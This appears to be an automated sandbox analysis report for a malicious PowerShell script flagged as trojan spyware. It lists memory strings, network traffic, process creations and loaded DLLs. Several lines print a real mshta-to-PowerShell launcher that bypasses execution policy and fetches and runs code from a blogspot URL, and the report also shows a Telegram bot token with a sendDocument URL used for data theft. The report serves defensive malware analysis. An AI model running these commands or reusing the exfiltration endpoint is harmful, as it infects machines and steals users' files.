              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://minecap4-22-24.blogspot.com
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://minecap4-22-24.blogspot.com/haha
              Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pubsubhubbub.appspot.com/
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/blogger/2008
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/g/2005
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/g/2005#thumbnail
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA7F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/styles/atom.css
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.georss.org/georss
              Source: powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA82B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLR
              Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000012.00000003.2335885953.00000235C65F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img1.blogblog.com/img/b16-rounded.gif
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB2A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.com
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.com/
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.com/atom.xml
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.com/feeds/posts/default
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://minecap4-22-24.blogspot.com/haha
              Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
              Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49739 version: TLS 1.2
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_017112B84_2_017112B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_017112A74_2_017112A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01710E904_2_01710E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01710E804_2_01710E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A712B85_2_00A712B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A733635_2_00A73363
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A7E4D05_2_00A7E4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A7D8B85_2_00A7D8B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A7DC005_2_00A7DC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A712B45_2_00A712B4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A70E8B5_2_00A70E8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A70E905_2_00A70E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067082485_2_06708248
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067719405_2_06771940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_06771AB05_2_06771AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067ADF005_2_067ADF00
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@29/26@4/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhcrz10j.ok1.ps1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788
              Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
              Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
